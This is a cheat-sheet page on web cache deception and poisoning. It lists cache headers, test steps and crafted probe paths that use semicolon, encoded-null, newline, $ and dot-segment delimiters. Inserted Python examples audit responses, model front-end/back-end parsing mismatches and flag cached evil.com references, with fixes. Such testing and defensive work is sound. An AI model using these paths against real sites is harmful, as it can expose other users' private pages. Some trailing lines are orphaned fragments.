Web Cache
Web cache deception and web cache poisoning
Cache indicator headers:

X-Cache: HIT           Generic caches (Varnish, Squid)   Response served from the server or proxy cache.
CF-Cache-Status: HIT   Cloudflare (CDN)                  Response served from Cloudflare's cache.

Headers to look for:
X-Cache: HIT or CF-Cache-Status: HIT (depending on the cache used)
Cache-Control: public -> that means anyone could potentially retrieve this response.
Response: This page should not be put in cache

Web cache deception: try adding .jpg / .js / .css

1. Normal request: note the response.
2. Add a cacheable extension to the path (for example .js / .css / .jpg, etc.) and note the response.
3. If the CF-Cache-Status / X-Cache header in the response says HIT (not MISS or an error), open the URL in incognito mode (an unauthenticated session).
4. Add ; before the extension (for example ;.js / ;.css / ;.jpg, etc.) and repeat the check: if CF-Cache-Status / X-Cache says HIT (not MISS or an error), open the URL in incognito mode.
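The following is an added example, not code from the original page: it turns the header table and the steps above into a small audit over constructed responses. The header names (X-Cache, CF-Cache-Status, Cache-Control) are the page's; the sample URLs, bodies and the "This page should not be put in cache" marker are constructed test data, and the STATIC_EXTENSIONS set is an assumption about what a front-end cache treats as static.

```python
from __future__ import annotations

# Response headers the page lists as cache indicators (matched case-insensitively).
CACHE_STATUS_HEADERS = ("x-cache", "cf-cache-status")
# Assumption: extensions a front-end cache treats as static (the page's .js/.css/.jpg plus .avif).
STATIC_EXTENSIONS = (".js", ".css", ".jpg", ".avif")
# Hardening: what a user-specific response should carry so no shared cache stores it.
RECOMMENDED_HEADERS = {"Cache-Control": "no-store, private"}


def _lower(headers: dict[str, str]) -> dict[str, str]:
    """Header names are case-insensitive; key them in lower case."""
    return {k.lower(): v for k, v in headers.items()}


def cache_status(headers: dict[str, str]) -> str:
    """First token of X-Cache / CF-Cache-Status, upper-cased: 'HIT', 'MISS',
    'DYNAMIC', ... ; 'NONE' when neither header is present. Varnish/Squid
    style values such as 'HIT from cache-1' reduce to 'HIT'."""
    h = _lower(headers)
    for name in CACHE_STATUS_HEADERS:
        if name in h:
            tokens = h[name].strip().upper().split()
            return tokens[0] if tokens else "NONE"
    return "NONE"


def shared_cacheable(headers: dict[str, str]) -> bool:
    """True when Cache-Control lets a shared cache (CDN/proxy) store the response.
    'no-store' and 'private' forbid it. With no Cache-Control at all many caches
    fall back to URL-based heuristics (the extension), which is exactly what
    web cache deception relies on, so a missing header counts as cacheable."""
    cc = _lower(headers).get("cache-control", "")
    directives = {d.strip().lower() for d in cc.split(",") if d.strip()}
    return not ({"no-store", "private"} & directives)


def deception_risk(url: str, headers: dict[str, str], body: str,
                   private_marker: str) -> str | None:
    """Apply the page's test to one response: a dynamic page requested under a
    static-looking suffix was answered with private content (body contains
    `private_marker`). Returns:
      'served-from-cache' - X-Cache / CF-Cache-Status says HIT: the private page
                            is already stored and served to other clients;
      'cacheable'         - not a HIT yet, but nothing in Cache-Control stops
                            the next hop from storing it;
      None                - not the pattern, or the response forbids caching."""
    path = url.split("?", 1)[0]
    if not path.lower().endswith(STATIC_EXTENSIONS) or private_marker not in body:
        return None
    if cache_status(headers) == "HIT":
        return "served-from-cache"
    if shared_cacheable(headers):
        return "cacheable"
    return None


# Constructed sample responses (not captured from any real site).
PRIVATE_MARKER = "This page should not be put in cache"
SAMPLES = [
    ("https://www.example.com/profile.php",
     {"Content-Type": "text/html", "Set-Cookie": "session=abc"},
     "<h1>My account</h1>" + PRIVATE_MARKER),
    ("https://www.example.com/profile.php/test.js",
     {"Content-Type": "text/html", "X-Cache": "MISS from cache-1"},
     "<h1>My account</h1>" + PRIVATE_MARKER),
    ("https://www.example.com/profile.php/test.js",
     {"Content-Type": "text/html", "X-Cache": "HIT from cache-1"},
     "<h1>My account</h1>" + PRIVATE_MARKER),
    ("https://www.example.com/profile.php;.css",
     {"Content-Type": "text/html", "CF-Cache-Status": "DYNAMIC",
      "Cache-Control": "no-store, private"},
     "<h1>My account</h1>" + PRIVATE_MARKER),
]


def audit(samples=SAMPLES, marker=PRIVATE_MARKER):
    """Run deception_risk over every sample; returns (url, verdict) pairs."""
    return [(url, deception_risk(url, hdrs, body, marker)) for url, hdrs, body in samples]


if __name__ == "__main__":
    for url, verdict in audit():
        print(f"{verdict or 'ok':18} {url}")
```

The last sample shows the fix from the response side: with `Cache-Control: no-store, private` the same request is not flagged even though the path still ends in .css. The complementary fix on the routing side is for the back-end to answer /profile.php/test.js with a 404 instead of the profile page.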
www.example.com/profile.php/.js
www.example.com/profile.php/.css
www.example.com/profile.php/test.js
www.example.com/profile.php/../test.js
www.example.com/profile.php/%2e%2e/test.js
Use lesser-known extensions such as .avif

/profile isn't getting cached... but /assets/* is
Matrix variables use a semicolon to add parameters:
/user;params/home -> /user/home
/Myaccount;a.js -> /MyAccount

Response format specifiers use a dot to render views:
/MyAccount     -> default view: myaccount.html.erb
/MyAccount.css -> view: myaccount.css.erb
/MyAccount.aaa -> default view: myaccount.html.erb
/MyAccount.ico -> default view: myaccount.html.erb

Encoded null as delimiter:
/MyAccount%00a.js -> /MyAccount

Encoded newline as delimiter (if rewrite is enabled):
/user/MyAccount%0a.js -> /account/MyAccount

Path normalization:
/%68%65%6C%6C%6F -> /hello
/hello%2Fworld%2Ehtml -> /hello/world.html
/hello/../world -> /world
/hello\world -> /hello/world

Delimiter combined with path normalization:
/MyAccount$%2F%2E%2E%2Fstatic%2Fwcd -> /MyAccount/../static/wcd
Front end - path normalization: /static/wcd
Back end - $ is a delimiter: /MyAccount
For example, this is the case when CloudFront/Azure/Imperva is combined with Tomcat.
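To make the front-end/back-end disagreement above concrete, here is an added example (not from the original page and not any vendor's code) with two deliberately simplified parsers: a front-end that percent-decodes, folds backslashes and collapses dot-segments before deciding by extension or prefix whether a response is cacheable, and a back-end that cuts the path at the first of the delimiters the page lists (;, encoded null, encoded newline, $) and treats anything after a .php segment as extra path info. The delimiter set, the static extensions and prefixes, and both parsing behaviours are modelling assumptions; the example goes beyond the page only in running all of its listed paths through the same check. The output lists the paths where the front-end would store a response the back-end produced for a dynamic route.

```python
import posixpath
from urllib.parse import unquote

# Assumptions about what the front-end (CDN/proxy) treats as static content.
STATIC_EXTENSIONS = (".js", ".css", ".jpg", ".ico", ".avif")
STATIC_PREFIXES = ("/static/", "/assets/")
# Delimiters the page lists, applied after percent-decoding: matrix parameter
# separator, encoded null, encoded newline (rewrite enabled) and $ (the
# Tomcat case the page describes).
BACKEND_DELIMITERS = (";", "\x00", "\n", "$")

# Paths taken from the page, plus one constructed control (/assets/app.js).
PAGE_PATHS = [
    "/profile.php/.js",
    "/profile.php/.css",
    "/profile.php/test.js",
    "/profile.php/../test.js",
    "/profile.php/%2e%2e/test.js",
    "/user;params/home",
    "/Myaccount;a.js",
    "/MyAccount.aaa",
    "/MyAccount%00a.js",
    "/user/MyAccount%0a.js",
    "/%68%65%6C%6C%6F",
    "/hello%2Fworld%2Ehtml",
    "/hello/../world",
    "/hello\\world",
    "/MyAccount$%2F%2E%2E%2Fstatic%2Fwcd",
    "/assets/app.js",
]


def frontend_cache_key(path: str) -> str:
    """Front-end view of the path: percent-decode, treat '\\' as '/', collapse
    '.' and '..' segments. This normalised form drives the caching decision."""
    return posixpath.normpath(unquote(path).replace("\\", "/"))


def looks_static(path: str) -> bool:
    """Extension- or prefix-based 'is this a static asset?' heuristic."""
    return path.lower().endswith(STATIC_EXTENSIONS) or path.startswith(STATIC_PREFIXES)


def frontend_would_cache(path: str) -> bool:
    return looks_static(frontend_cache_key(path))


def backend_route(path: str) -> str:
    """Back-end view of the same path: percent-decode, cut at the first
    delimiter, drop extra path info after a *.php segment (PATH_INFO style),
    then collapse dot-segments. Backslashes are left alone."""
    decoded = unquote(path)
    for delimiter in BACKEND_DELIMITERS:
        decoded = decoded.split(delimiter, 1)[0]
    segments = decoded.split("/")
    for i, seg in enumerate(segments):
        if seg.lower().endswith(".php"):
            decoded = "/".join(segments[: i + 1])
            break
    return posixpath.normpath(decoded)


def find_discrepancies(paths=PAGE_PATHS):
    """Paths the front-end would cache although the back-end serves a dynamic
    route for them; each entry is (path, front-end key, back-end route)."""
    out = []
    for p in paths:
        route = backend_route(p)
        if frontend_would_cache(p) and not looks_static(route):
            out.append((p, frontend_cache_key(p), route))
    return out


if __name__ == "__main__":
    for path, key, route in find_discrepancies():
        print(f"{path:40} cached as {key:25} served from {route}")
```

Every flagged entry is a case where the two components disagree about what the URL means, which is the root cause the page describes. The front-end fix is to stop keying cacheability on the URL shape and cache only what the back-end marks cacheable (Cache-Control and Content-Type); the back-end fix is to reject or 404 paths whose delimiter or extra-path-info part it would otherwise silently discard.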
Web cache poisoning: checking the response

Look for evil.com and X-Cache: HIT / CF-Cache-Status: HIT in the response.
If the response contains X-Cache: HIT / CF-Cache-Status: HIT and the returned page is malicious or incorrect (e.g., an error page or an admin page), it is possible that the cache has been poisoned with an incorrect response.
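An added example, not from the page, of the response check described above as code. It treats the page's two signals, a cache HIT in X-Cache / CF-Cache-Status and a reference to an origin the site does not own (the "look for evil.com" test), as separate findings and reports when they coincide, with a cached error page as a third finding. The trusted host list, the sample responses and the status-code rule are constructed for the example.

```python
import re

# Origins the site is expected to reference; anything else found in a cached
# response is reported. Constructed for this example.
TRUSTED_HOSTS = {"www.example.com", "example.com", "cdn.example.com"}
# Host part of absolute (http://, https://) and protocol-relative (//) URLs.
URL_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+)", re.IGNORECASE)
CACHE_STATUS_HEADERS = ("x-cache", "cf-cache-status")


def is_cache_hit(headers: dict) -> bool:
    """X-Cache / CF-Cache-Status starts with HIT (case-insensitive)."""
    h = {k.lower(): v.strip().upper() for k, v in headers.items()}
    return any(h.get(name, "").startswith("HIT") for name in CACHE_STATUS_HEADERS)


def foreign_hosts(headers: dict, body: str, trusted=TRUSTED_HOSTS) -> list:
    """Hosts referenced in the body or in redirect/link headers that are not trusted."""
    found = set(URL_RE.findall(body))
    for name in ("location", "link", "content-location"):
        for k, v in headers.items():
            if k.lower() == name:
                found.update(URL_RE.findall(v))
    return sorted(h.lower() for h in found if h.lower() not in trusted)


def poisoning_indicators(status: int, headers: dict, body: str,
                         trusted=TRUSTED_HOSTS) -> dict:
    """A cache HIT that references an origin the site does not own, or a cache
    HIT for an error response, both point at a poisoned cache entry. A foreign
    origin on a MISS is reported too: that response is about to be stored if
    nothing prevents it."""
    hit = is_cache_hit(headers)
    hosts = foreign_hosts(headers, body, trusted)
    findings = []
    if hit and hosts:
        findings.append("cached-untrusted-origin")
    if hit and status >= 400:
        findings.append("cached-error-page")
    if hosts and not hit:
        findings.append("untrusted-origin-not-cached")
    return {"cache_hit": hit, "foreign_hosts": hosts, "findings": findings}


# Constructed sample responses as (status, headers, body); not real captures.
SAMPLES = [
    (200, {"X-Cache": "HIT from cache-1"},
     '<script src="https://cdn.example.com/app.js"></script>'),
    (200, {"CF-Cache-Status": "HIT"},
     '<script src="//evil.com/x.js"></script>'),
    (500, {"X-Cache": "HIT from cache-1", "Cache-Control": "public, max-age=60"},
     "Internal Server Error"),
    (200, {"X-Cache": "MISS from cache-1"},
     '<a href="http://evil.com/">x</a>'),
]


def run(samples=SAMPLES):
    """Findings for each sample, in order."""
    return [poisoning_indicators(s, h, b)["findings"] for s, h, b in samples]


if __name__ == "__main__":
    for (status, _, _), findings in zip(SAMPLES, run()):
        print(status, findings or "clean")
```

On the mitigation side the third sample is the one most often overlooked: error responses should not be cacheable at all (no `Cache-Control: public` on 4xx/5xx), and the cache key should be derived from the Host header and path only, with any other header the back-end reflects into the page either stripped at the edge or added to the key.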
Example 2: right-click on a request that you want to investigate and click "Guess headers".
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Credits:
See below for more information - Source: